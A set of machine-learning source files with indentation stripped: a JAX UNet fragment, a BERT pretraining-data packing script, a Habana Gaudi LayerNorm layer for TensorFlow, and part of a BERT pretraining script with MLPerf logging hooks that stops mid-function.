for downsample in downsample_fns:
@jax.jit
def jdownsample(y):
return downsample(y, tensor_name="down%s" % down_index)
x = jdownsample(x)
down_index += 1
outputs.append(x)
@jax.jit
def jbottleneck(y):
return bottleneck(y, tensor_name="down%s" % down_index)
x = jbottleneck(x)
up_index = 0
for upsample, skip in zip(upsample_fns, reversed(outputs)):
@jax.jit
def jupsample(y, z):
return upsample(y, z, tensor_name="up%s" % up_index)
x = jupsample(x, skip)
up_index += 1
@jax.jit
def joutput_block(y):
return output(y, tensor_name="output")
x = joutput_block(x)
# pylint: enable=unnecessary-lambda,cell-var-from-loop
return x
```
#### File: implementations/popart/pack_pretraining_data.py
```python
import os
import time
import glob
import struct
import random
import argparse
import numpy as np
import pandas as pd
from scipy import optimize
from itertools import repeat, chain
from functools import lru_cache, reduce
from collections import defaultdict
from matplotlib import pyplot as plt
from concurrent.futures import ProcessPoolExecutor
from bert_data.pretraining_dataset import CachedDataLoader, data_file_format
@lru_cache(maxsize=None)
def packing_strategies(start, previous, target, depth):
gap = target - start
# The collection of possible strategies given the
# starting sum, the target sum, and the available depth
# strategy search is limited to increments greater or equal to previous
strategies = []
# Complete the packing with exactly 1 number
if depth == 1:
if gap >= previous:
strategies.append([gap])
# Complete the sample in "depth" steps, recursively
else:
for new in range(previous, gap + 1):
new_gap = target - start - new
if new_gap == 0:
strategies.append([new])
else:
options = packing_strategies(start + new, new, target, depth - 1)
for option in options:
if len(option) > 0:
strategies.append([new] + option)
return strategies
def get_packing_recipe(sequence_lengths, max_sequence_length, max_sequences_per_pack=3):
# Histogram of sequence lengths
histogram, bins = np.histogram(sequence_lengths, bins=np.arange(1, max_sequence_length + 2))
print("Begin packing pass".center(80, "_"))
print(f"Unpacked mean sequence length: {sequence_lengths.mean():3.2f}")
# Make sure all strategies are recipes to pack to the correct sequence length
strategy_set = packing_strategies(0, 1, max_sequence_length, max_sequences_per_pack)
for strategy in strategy_set:
assert(sum(strategy) == max_sequence_length)
num_strategies = len(strategy_set)
print(f"Found {num_strategies} unique packing strategies.")
# Solve the packing equation A@mixture = histogram
A = np.zeros((max_sequence_length, num_strategies), dtype=np.int32)
for i in range(num_strategies):
strategy = strategy_set[i]
for seq_len in strategy:
A[seq_len - 1, i] += 1
# short sequences are inexpensive to add, so should have low residual weights
# to exactly minimize padding use w0 = np.arange(1, max_sequence_length + 1)
# in practice the difference is negligible, but this converges faster
padding_cutoff = 8
w0 = np.ones([max_sequence_length])
# w0 = np.linspace(1, max_sequence_length+1, max_sequence_length)/max_sequence_length # padding minimization weight
w0[:padding_cutoff] = padding_cutoff / (2 * max_sequence_length)
w0 = np.sqrt(w0)
# Starting values for the padding and the mixture
padding = np.zeros([max_sequence_length], dtype=np.int32)
mixture = np.zeros([num_strategies], dtype=np.int32)
b = histogram + padding
# Pack sequences as best as possible, then increase padding accordingly and repeat
for i in range(0, 20):
print(f"\nIteration: {i}: sequences still to pack: ", b.sum())
start = time.time()
partial_mixture, rnorm = optimize.nnls(np.expand_dims(w0, -1) * A, w0 * b)
print(f"Solving nnls took {time.time() - start:3.2f} seconds.")
print(f"Residual norm: {rnorm:3.5e}")
# Update mixture (round the floating point solution to integers)
partial_mixture = np.where(partial_mixture < 2, np.rint(partial_mixture), np.floor(partial_mixture))
# If partial mixture is empty (due to rounding) we follow the gradient
# this usually happens when the number of examples is small i.e. ~100
if partial_mixture.max() == 0:
grad = A.T @ (b * np.arange(1, max_sequence_length + 1))
k = int(b.sum() // 2) + 1
topk = np.argsort(-grad)[:k]
partial_mixture[topk] += 1
# Update mixture
mixture = mixture + partial_mixture
# Compute the residuals
residual = b - A @ partial_mixture
print(f"Max residual: {abs(residual).max()}")
print(f"Residual on first 8 categories: {np.around(residual[:8], 4)}")
print(f"Residual on last 8 categories: {np.around(residual[-8:], 4)}")
# Add padding based on deficit (negative residual)
partial_padding = np.where(residual < 0, -residual, 0)
print(f"Added {(partial_padding*np.arange(1,max_sequence_length+1)).sum():3.2e} tokens of padding.")
padding = padding + partial_padding
# Update the rhs vector (remaining surplus sequences)
b = histogram + padding - A @ mixture
assert np.all(b >= 0), b
# Done iterating
if b.sum() < 100:
break
# Make sure there is no remainder
unpacked_seqlen = np.arange(1, args.max_sequence_length + 1)[b > 0]
# Update the mixture to also covered the unpacked sequences
for l in unpacked_seqlen:
# Get the depth 1 strategy
strategy = sorted([l, args.max_sequence_length - l])
strategy_index = strategy_set.index(strategy)
mixture[strategy_index] += b[l-1]
b = histogram - A @ mixture
padding = np.where(b < 0, -b, 0)
b = histogram + padding - A @ mixture
assert b.sum() == 0
# Analyze result
print("Done solving for packing order".center(80, "_"))
num_padding_tokens = (np.arange(1, max_sequence_length + 1) * padding).sum()
num_padding_tokens_original = (max_sequence_length - sequence_lengths).sum()
print(f"Number of sequences dropped: {b.sum()}")
print(f"Number of strategies utilized: {np.count_nonzero(mixture)}")
new_number_of_samples = int(mixture.sum())
compression = 1 - new_number_of_samples / len(sequence_lengths)
print(f"New number of samples: {new_number_of_samples:3.2f}, original {len(sequence_lengths)}. A compression ratio of {compression:3.3f}")
print(f"The expected speed-up from packing: {1/(1-compression):3.3f}")
upper_bound = 1.0 / (1 - ((1 - sequence_lengths / max_sequence_length).mean()))
print(f"Theoretical upper bound on speed-up: {upper_bound:3.3f}")
avg_sequences_per_sample = ((A.sum(0) * mixture).sum() - padding.sum()) / new_number_of_samples
print(f"Average sequences/sample {avg_sequences_per_sample:3.5f}")
print(f"Added {num_padding_tokens:3.2e} padding tokens. Original dataset used {num_padding_tokens_original:3.2e} padding tokens")
efficiency = (new_number_of_samples*max_sequence_length - num_padding_tokens)/(new_number_of_samples*max_sequence_length)
print(f"Packing efficiency (fraction of real tokens): {efficiency:3.4f}")
print(f"Top 8 strategies")
topK = np.argsort(-mixture)[:8]
for i in topK:
print(f"Strategy {strategy_set[i]} which is used {int(mixture[i])} times")
print("".center(80, "_"))
# Figure out the slicing that each strategy should use
slicing = np.zeros_like(A)
slicing[:, 1:] = np.cumsum(A * mixture, axis=1)[:, :-1]
slicing = slicing.T
mixture = mixture.astype(np.int64)
return strategy_set, mixture, padding, slicing
def slice_examples(examples_by_length, slicing, strategy_set, repeat_counts):
# Divide the work, firstly between the strategies and then into chunks of 50k
slices = []
strategies = []
part_idx = []
for strategy, slice_offsets, repeat_count in zip(strategy_set, slicing, repeat_counts):
if repeat_count == 0:
continue
# Slice out the sequences allocated to this strategy in increments of 50k
num_parts = repeat_count // 50000
num_parts = num_parts + int(repeat_count != num_parts * 50000)
subcounts = (min(50000, repeat_count - 50000 * (i - 1)) for i in range(1, num_parts + 1))
for part_id, part_count in enumerate(subcounts):
examples = []
for k, seq_len in enumerate(strategy):
slice_start = int(slice_offsets[seq_len - 1])
slice_end = slice_start + int(part_count)
slice_offsets[seq_len - 1] = slice_end
examples.append(examples_by_length[seq_len][slice_start:slice_end])
slices.append(examples)
strategies.append(strategy)
part_idx.append(part_id)
return slices, strategies, part_idx
def parallel_pack_according_to_strategy(args, part_idx, strategy, examples):
# Pack the sequences according to the strategy and write them to disk
base_filename = os.path.join(args.output_dir, "strategy_" + "_".join(map(str, strategy)))
filename = base_filename + f"_part_{part_idx}"
lines = []
for i, multi_sequence in enumerate(zip(*examples)):
lines.append(create_multi_sequence_example(multi_sequence, args.max_predictions_per_sequence,
args.max_sequence_length, args.max_sequences_per_pack))
# Write to file
with open(filename, "wb") as f:
f.writelines(lines)
def create_multi_sequence_example(multi_sequence, max_predictions_per_sequence, max_sequence_length, max_sequences_per_pack):
# SEQ
packed_input_ids = np.zeros(max_sequence_length, dtype=np.int32)
packed_input_mask = np.zeros(max_sequence_length, dtype=np.int32)
packed_segment_ids = np.zeros(max_sequence_length, dtype=np.int32)
packed_positions = np.zeros(max_sequence_length, dtype=np.int32)
# MLM
# we are packing up to max_sequences_per_pack, each with a certain percentage of masked tokens
# in case that percentege is rounded up for all sequences in the pack, need to add an extra token for
# each sequence in the pack
packed_masked_lm_positions = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
packed_masked_lm_ids = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
packed_masked_lm_weights = np.zeros(max_predictions_per_sequence + max_sequences_per_pack, dtype=np.int32)
# NSP
packed_next_sentence_positions = np.zeros(max_sequences_per_pack, dtype=np.int32)
packed_next_sentence_labels = np.zeros(max_sequences_per_pack, dtype=np.int32)
packed_next_sentence_weights = np.zeros(max_sequences_per_pack, dtype=np.int32)
offset = 0
mlm_offset = 0
sequence_index = 1 # used in the input mask
for sequence in multi_sequence:
# Padding sequences are donoted with None
if sequence is not None:
input_ids, input_mask, segment_ids, masked_lm_positions, masked_lm_ids, masked_lm_weights, next_sentence_labels = sequence
seq_len = input_mask.sum()
# SEQ
packed_input_ids[offset:offset + seq_len] = input_ids[:seq_len]
packed_input_mask[offset:offset + seq_len] = sequence_index
packed_segment_ids[offset:offset + seq_len] = segment_ids[:seq_len]
packed_positions[offset:offset + seq_len] = np.arange(0, seq_len)
# MLM
mlm_len = int(masked_lm_weights.sum())
assert mlm_offset + mlm_len < max_predictions_per_sequence + max_sequences_per_pack, "Too many LM predictions per sequences"
max_mlm = mlm_offset + mlm_len
packed_masked_lm_positions[mlm_offset:max_mlm] = offset + masked_lm_positions[:mlm_len]
packed_masked_lm_ids[mlm_offset:max_mlm] = masked_lm_ids[:mlm_len]
packed_masked_lm_weights[mlm_offset:max_mlm] = sequence_index
# NSP
packed_next_sentence_positions[sequence_index - 1] = offset
packed_next_sentence_labels[sequence_index - 1] = next_sentence_labels
packed_next_sentence_weights[sequence_index - 1] = 1
# Update offsets
sequence_index += 1
offset += seq_len
mlm_offset = max_mlm
# Pack into binary format and write it
line = reduce(lambda accl, i: accl + struct.pack('<I', i),
chain(packed_input_ids,
packed_input_mask,
packed_segment_ids,
packed_positions,
packed_masked_lm_positions,
packed_masked_lm_ids,
packed_masked_lm_weights,
packed_next_sentence_positions,
packed_next_sentence_labels,
packed_next_sentence_weights), b'')
return line
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--input-glob", help="A glob expression for the input files to read in and pack", required=True, type=str)
parser.add_argument("--output-dir", help="The destination folder for the output files", required=True)
parser.add_argument("--random-seed", help="For shuffling the data", default=12345)
parser.add_argument("--max-files", help="At most how many files to process (limited by RAM)", default=100)
parser.add_argument("--duplication-factor", help="Same as the one passed to create input data", default=1, type=int)
parser.add_argument("--max-sequence-length", help="The maximum number of tokens in an example", default=512, type=int)
parser.add_argument("--max-predictions-per-sequence", help="The maximum number of masked tokens in an un-packed example", default=76, type=int)
parser.add_argument("--max-sequences-per-pack", help="The maximum number of sequences per packed example.", choices=[2, 3], default=3, type=int)
args = parser.parse_args()
random.seed(args.random_seed)
# Input files
input_files = glob.glob(args.input_glob)
if len(input_files) > args.max_files:
input_files = np.random.choice(input_files, size=args.max_files, replace=False)
assert len(input_files) > 0
# Load un-packed dataset
sample_sizes = data_file_format(args.max_sequence_length, args.max_predictions_per_sequence)
load_size = 1 if len(input_files) == 1 else 1024
dataset = CachedDataLoader(input_files, sample_sizes, duplication_factor=args.duplication_factor, batch_size=load_size)
# Put examples into bins depending on their sequence lengths and extract the sequence length
# as an array
sequence_lengths = []
examples_by_length = defaultdict(list)
print("Looping through dataset to collect sequence length information...")
for data in dataset:
input_mask = data[1]
batch_of_lengths = input_mask.sum(1).tolist()
for i, length in enumerate(batch_of_lengths):
examples_by_length[length].append([data[k][i] for k in range(len(data))])
sequence_lengths.extend(batch_of_lengths)
sequence_lengths = np.array(sequence_lengths)
# Pass the array of sequence lengths to the packing algorithm
strategy_set, mixture, padding, slicing = get_packing_recipe(sequence_lengths, args.max_sequence_length, args.max_sequences_per_pack)
# Add the calculated padding
for i in range(1, args.max_sequence_length + 1):
examples_by_length[i].extend([None] * int(padding[i - 1]))
# Shuffle the data
for key in examples_by_length:
random.shuffle(examples_by_length[key])
# Pack and store the data
print(f"\nPacking and writing packed dataset to {args.output_dir}.")
# Slice the data into chunks of max 50k packed examples
example_slices, strategies, part_idx = slice_examples(examples_by_length, slicing, strategy_set, mixture)
print(f"Splitting work into {len(part_idx)} parts.")
start = time.time()
with ProcessPoolExecutor(16) as executor:
work = repeat(args), part_idx, strategies, example_slices
for partial_result in executor.map(parallel_pack_according_to_strategy, *work):
pass
print(f"\nDone. Took: {time.time() - start:3.2f} seconds to pack and write dataset.")
```
#### File: TensorFlow/common/habana_layer_norm.py
```python
from TensorFlow.common.library_loader import habana_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.ops import variables as tf_variables
@ops.RegisterGradient("HabanaLayerNorm")
def _HabanaLayerNorm(op, *grads):
""" Return the gradients for the 3 inputs of HabanaLayerNorm.
Args:
op: HabanaLayerNormOp for which we compute gradients.
*grad: An argument list for tensors of gradients wrt the outputs
with grad[0] as grad_y.
Returns:
grad_x: gradient for x
grad_beta: gradient for beta (bias)
grad_gamma: gradient for gamma (scale)
"""
return habana_ops.habana_layer_norm_grad(
x=op.inputs[0],
grad_in=grads[0],
mean=op.outputs[1],
istd=op.outputs[2],
gamma=op.inputs[2],
epsilon=op.node_def.attr["epsilon"].tensor,
axes=op.node_def.attr["axes"].tensor
)
class HabanaLayerNormalization(Layer):
"""
Has the same behaviour as
https://www.tensorflow.org/api_docs/python/tf/keras/layers/LayerNormalization
It directly uses HabanaLayerNorm op so it works only on Habana Gaudi.
"""
def __init__(self,
axis=-1,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
**kwargs):
super(HabanaLayerNormalization, self).__init__(**kwargs)
if isinstance(axis, (list, tuple)):
self.axis = axis[:]
elif isinstance(axis, int):
self.axis = axis
else:
raise TypeError('Expected an int or a list/tuple of ints for the '
'argument \'axis\', but received: %r' % axis)
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = initializers.get(beta_initializer)
self.gamma_initializer = initializers.get(gamma_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.gamma_constraint = constraints.get(gamma_constraint)
self.supports_masking = True
def build(self, input_shape):
ndims = len(input_shape)
if ndims is None:
raise ValueError(
'Input shape %s has undefined rank.' % input_shape)
# Convert axis to list and resolve negatives
if isinstance(self.axis, int):
self.axis = [self.axis]
elif isinstance(self.axis, tuple):
self.axis = list(self.axis)
for idx, x in enumerate(self.axis):
if x < 0:
self.axis[idx] = ndims + x
# Validate axes
for x in self.axis:
if x < 0 or x >= ndims:
raise ValueError('Invalid axis: %d' % x)
if len(self.axis) != len(set(self.axis)):
raise ValueError('Duplicate axis: {}'.format(tuple(self.axis)))
param_shape = [input_shape[dim] for dim in self.axis]
if self.scale:
self.gamma = self.add_weight(
name='gamma',
shape=param_shape,
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
trainable=True,
experimental_autocast=False)
else:
self.gamma = None
if self.center:
self.beta = self.add_weight(
name='beta',
shape=param_shape,
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
trainable=True,
experimental_autocast=False)
else:
self.beta = None
self.built = True
def call(self, inputs):
outputs, _, _ = habana_ops.habana_layer_norm(
x=inputs,
beta=self.beta,
gamma=self.gamma,
axes=tensor_util.make_tensor_proto(self.axis),
epsilon=tensor_util.make_tensor_proto(self.epsilon)
)
return outputs
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = {
'axis': self.axis,
'epsilon': self.epsilon,
'center': self.center,
'scale': self.scale,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint)
}
base_config = super(HabanaLayerNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
```
#### File: nlp/bert/run_pretraining.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import TensorFlow.nlp.bert.modeling as modeling
import TensorFlow.nlp.bert.optimization as optimization
import tensorflow as tf
import glob
from TensorFlow.nlp.bert.utils.utils import LogEvalRunHook
import TensorFlow.nlp.bert.utils.dllogger_class as dllogger_class
from dllogger import Verbosity
import math
import numbers
import numpy as np
from tensorflow.core.protobuf import rewriter_config_pb2
from TensorFlow.common.tb_utils import ExamplesPerSecondEstimatorHook, write_hparams_v1
from TensorFlow.common.horovod_helpers import hvd, hvd_init, hvd_size, hvd_rank, horovod_enabled, comm_local_rank
from TensorFlow.common.str2bool import condition_env_var
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, '..', '..'))
from TensorFlow.common.library_loader import load_habana_module
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
class TrainableVarsAllreducingHookPreOpt(tf.compat.v1.estimator.SessionRunHook):
def __init__(self, num_accumulation_steps=1):
super(TrainableVarsAllreducingHookPreOpt, self).__init__()
# Modify this collection in order to allreduce other set of variables
trainable_vars = tf.compat.v1.trainable_variables()
allreduced_trainable_var_ops = [ v.assign(hvd.allreduce(v)) for v in trainable_vars]
self.allreduce_trainable_vars_op = tf.group(*allreduced_trainable_var_ops)
self.num_accumulation_steps = num_accumulation_steps
self.current_iteration = 1
def before_run(self, run_context):
if self.current_iteration % self.num_accumulation_steps == 0:
return tf.compat.v1.train.SessionRunArgs(self.allreduce_trainable_vars_op)
def after_run(self, run_context, run_values):
self.current_iteration += 1
trainable_vars_allreduce_result = run_values.results
def init_flags():
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_integer("samples_between_eval", 150000, "MLPerf Evaluation frequency in samples.")
flags.DEFINE_float("stop_threshold", 0.720, "MLperf Mask LM accuracy target")
flags.DEFINE_integer("samples_start_eval", 3000000, " Required samples to start evaluation for MLPerf.")
flags.DEFINE_bool("enable_device_warmup", False, " Enable device warmup for MLPerf.")
flags.DEFINE_string(
"input_files_dir", None,
"Directory with input files, comma separated or single directory.")
flags.DEFINE_string(
"eval_files_dir", None,
"Directory with eval files, comma separated or single directory. ")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string(
"dllog_path", "/results/bert_dllog.json",
"filename where dllogger writes to")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_string(
"eval_checkpoint_path", None,
"eval checkpoint path.")
flags.DEFINE_bool(
'is_dist_eval_enabled', False, 'IF true enable distributed evaluation')
flags.DEFINE_string(
"optimizer_type", "lamb",
"Optimizer used for training - LAMB or ADAM")
flags.DEFINE_integer(
"max_seq_length", 512,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer(
"max_predictions_per_seq", 80,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("save_summary_steps", 1,
"How often to save the summary data.")
flags.DEFINE_integer("display_loss_steps", 10,
"How often to print loss")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_integer("num_accumulation_steps", 1,
"Number of accumulation steps before gradient update."
"Global batch size = num_accumulation_steps * train_batch_size")
flags.DEFINE_bool("allreduce_post_accumulation", False, "Whether to all reduce after accumulation of N steps or after each step")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the trainable parameters are printed")
flags.DEFINE_bool("horovod", False, "Whether to use Horovod for multi-gpu runs")
flags.DEFINE_bool("report_loss", True, "Whether to report total loss during training.")
flags.DEFINE_bool("manual_fp16", False, "Whether to use fp32 or fp16 arithmetic on GPU. "
"Manual casting is done instead of using AMP")
flags.DEFINE_bool("amp", True, "Whether to enable AMP ops. When false, uses TF32 on A100 and FP32 on V100 GPUS.")
flags.DEFINE_bool("use_xla", True, "Whether to enable XLA JIT compilation.")
flags.DEFINE_integer("init_loss_scale", 2**32, "Initial value of loss scale if mixed precision training")
def get_mllog_mlloger():
from mlperf_logging import mllog
str_hvd_rank = str(hvd.rank()) if horovod_enabled() else "0"
mllogger = mllog.get_mllogger()
filenames = os.path.normpath(FLAGS.output_dir) + "/result_rank_" + str_hvd_rank + ".txt"
mllog.config(filename=filenames)
workername = "worker" + str_hvd_rank
mllog.config(
default_namespace = workername,
default_stack_offset = 1,
default_clear_line = False,
root_dir = os.path.normpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "..")))
return mllogger, mllog
def past_stop_threshold(stop_threshold, eval_metric):
"""Return a boolean representing whether a model should be stopped.
Args:
stop_threshold: float, the threshold above which a model should stop
training.
eval_metric: float, the current value of the relevant metric to check.
Returns:
True if training should stop, False otherwise.
Raises:
ValueError: if either stop_threshold or eval_metric is not a number
"""
if stop_threshold is None:
return False
if not isinstance(stop_threshold, numbers.Number):
raise ValueError("Threshold for checking stop conditions must be a number.")
if not isinstance(eval_metric, numbers.Number):
raise ValueError("Eval metric being checked against stop conditions "
"must be a number.")
if eval_metric >= stop_threshold:
tf.compat.v1.logging.info(
"Stop threshold of {} was passed with metric value {}.".format(
stop_threshold, eval_metric))
return True
return False
#_NUM_EXAMPLES_NAME = "num_examples"
# report samples/sec, total loss and learning rate during training
class _LogSessionRunHook(tf.estimator.SessionRunHook):
def __init__(self, global_batch_size, num_accumulation_steps, dllogging, display_every=10,
save_ckpt_steps=1000, report_loss=True, hvd_rank=-1):
self.global_batch_size = global_batch_size
self.display_every = display_every
self.save_ckpt_steps = save_ckpt_steps
self.hvd_rank = hvd_rank
self.num_accumulation_steps = num_accumulation_steps
self.dllogging = dllogging
self.report_loss = report_loss
self.skip_iters = 6
def after_create_session(self, session, coord):
self.elapsed_secs = 0.0 #elapsed seconds between every print
self.count = 0 # number of global steps between every print
self.all_count = 0 #number of steps (including accumulation) between every print
self.loss = 0.0 # accumulation of loss in each step between every print
self.total_time = 0.0 # total time taken to train (excluding warmup + ckpt saving steps)
self.step_time = 0.0 # time taken per step
self.init_global_step = session.run(tf.compat.v1.train.get_global_step()) # training starts at init_global_step
self.skipped = 0
def before_run(self, run_context):
if horovod_enabled() and hvd_rank() != 0:
return
self.t0 = time.time()
if self.num_accumulation_steps <= 1:
if FLAGS.manual_fp16 or FLAGS.amp:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0', 'loss_scale:0'])
else:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0'])
else:
if FLAGS.manual_fp16 or FLAGS.amp:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'update_step:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0', 'loss_scale:0'])
else:
return tf.estimator.SessionRunArgs(
fetches=['step_update:0', 'update_step:0', 'total_loss:0',
'learning_rate:0', 'nsp_loss:0',
'mlm_loss:0'])
def after_run(self, run_context, run_values):
if horovod_enabled() and hvd_rank() != 0:
return
run_time = time.time() - self.t0
if self.num_accumulation_steps <=1:
if FLAGS.manual_fp16 or FLAGS.amp:
self.global_step, total_loss, lr, nsp_loss, mlm_loss, loss_scaler = run_values.results
else:
self.global_step, total_loss, lr, nsp_loss, mlm_loss = run_values. \
results
update_step = True
else:
if FLAGS.manual_fp16 or FLAGS.amp:
self.global_step, update_step, total_loss, lr, nsp_loss, mlm_loss, loss_scaler = run_values.results
else:
self.global_step, update_step, total_loss, lr, nsp_loss, mlm_loss = run_values.\
results
self.elapsed_secs += run_time
self.step_time += run_time
print_step = self.global_step + 1 # One-based index for printing.
self.loss += total_loss
self.all_count += 1
if update_step:
self.count += 1
# Removing first six steps after every checkpoint save from timing
if (self.global_step - self.init_global_step) % self.save_ckpt_steps < self.skip_iters:
print("Skipping time record for ", self.global_step, " due to checkpoint-saving/warmup overhead")
self.skipped += 1
else:
self.total_time += self.step_time
self.step_time = 0.0 #Reset Step Time
if (print_step == 1 or print_step % self.display_every == 0):
dt = self.elapsed_secs / self.count
sent_per_sec = self.global_batch_size / dt
avg_loss_step = self.loss / self.all_count
if self.hvd_rank >= 0 and FLAGS.report_loss:
if FLAGS.manual_fp16 or FLAGS.amp:
self.dllogging.logger.log(step=(print_step),
data={"Rank": int(self.hvd_rank), "throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr), "loss_scaler":int(loss_scaler)},
verbosity=Verbosity.DEFAULT)
else:
self.dllogging.logger.log(step=int(print_step),
data={"Rank": int(self.hvd_rank), "throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr)},
verbosity=Verbosity.DEFAULT)
else:
if FLAGS.manual_fp16 or FLAGS.amp:
self.dllogging.logger.log(step=int(print_step),
data={"throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr), "loss_scaler":int(loss_scaler)},
verbosity=Verbosity.DEFAULT)
else:
self.dllogging.logger.log(step=int(print_step),
data={"throughput_train": float(sent_per_sec),
"mlm_loss":float(mlm_loss), "nsp_loss":float(nsp_loss),
"total_loss":float(total_loss), "avg_loss_step":float(avg_loss_step),
"learning_rate": str(lr)},
verbosity=Verbosity.DEFAULT)
self.elapsed_secs = 0.0
self.count = 0
self.loss = 0.0
self.all_count = 0
train_op_name = None
class MLPerfHook(tf.estimator.SessionRunHook):
def __init__(self, global_batch_size, num_accumulation_steps, num_train_steps, samples_between_eval,
weight_decay_rate, beta_1, beta_2, epsilon, power, enable_device_warmup):
'''
global_batch_size = train_batch_size * num_accumulation_steps * num_of_devices
num_train_steps = each step consumes global_batch_size samples
samples_between_eval = total samples in each block
'''
mllogger, mllog = get_mllog_mlloger()
mllogger.event(key=mllog.constants.CACHE_CLEAR)
mllogger.start(key=mllog.constants.INIT_START)
mllogger.event(key=mllog.constants.GLOBAL_BATCH_SIZE, value=global_batch_size)
mllogger.event(key=mllog.constants.TRAIN_SAMPLES, value=global_batch_size * FLAGS.num_train_steps)
mllogger.event(key=mllog.constants.MAX_SEQUENCE_LENGTH, value=FLAGS.max_seq_length)
mllogger.event(key='max_predictions_per_seq', value=FLAGS.max_predictions_per_seq)
mllogger.event(key=mllog.constants.GRADIENT_ACCUMULATION_STEPS, value=FLAGS.num_accumulation_steps)
mllogger.event(key=mllog.constants.OPT_LR_TRAINING_STEPS, value=FLAGS.num_train_steps)
mllogger.event(key=mllog.constants.NUM_WARMUP_STEPS, value=FLAGS.num_warmup_steps)
mllogger.event(key=mllog.constants.OPT_LR_WARMUP_STEPS, value=FLAGS.num_warmup_steps)
mllogger.event(key=mllog.constants.START_WARMUP_STEP, value=0)
mllogger.event(key=mllog.constants.OPT_BASE_LR, value=FLAGS.learning_rate if not FLAGS.horovod else FLAGS.learning_rate * hvd_size())
mllogger.event(key=mllog.constants.EVAL_SAMPLES, value=10000)
mllogger.event(key=mllog.constants.OPT_LAMB_BETA_1, value=beta_1)
mllogger.event(key=mllog.constants.OPT_LAMB_BETA_2, value=beta_2)
mllogger.event(key=mllog.constants.OPT_LAMB_LR_DECAY_POLY_POWER, value=power)
mllogger.event(key=mllog.constants.OPT_LAMB_WEIGHT_DECAY, value=weight_decay_rate)
mllogger.event(key="opt_epsilon", value=epsilon)
mllogger.start(key=mllog.constants.INIT_STOP)
self.mllogger = mllogger
self.mllog = mllog
self.chpt_timestamp_dict={}
self.run_start_timestamp=None
self.checkpoint_timestamp_dict={}
self.block_stop_timestamp_dict={}
num_steps_between_eval = math.ceil(samples_between_eval / global_batch_size)
n_loops = math.ceil(num_train_steps / num_steps_between_eval)
schedule = [num_steps_between_eval for _ in range(int(n_loops))]
schedule[-1] = num_train_steps - sum(schedule[:-1])
self.num_accumulation_steps = num_accumulation_steps
self.num_steps_between_eval = num_steps_between_eval
self.schedule = schedule
self.cycle_index = 0
self.count = 0 # global step counter
self.block_started = False
self.enable_device_warmup = enable_device_warmup
def after_create_session(self, session, coord):
if self.enable_device_warmup:
graph = session.graph
variables = list(filter(lambda op: op.type=='VarHandleOp', graph.get_operations()))
variable_names = [op.name for op in variables]
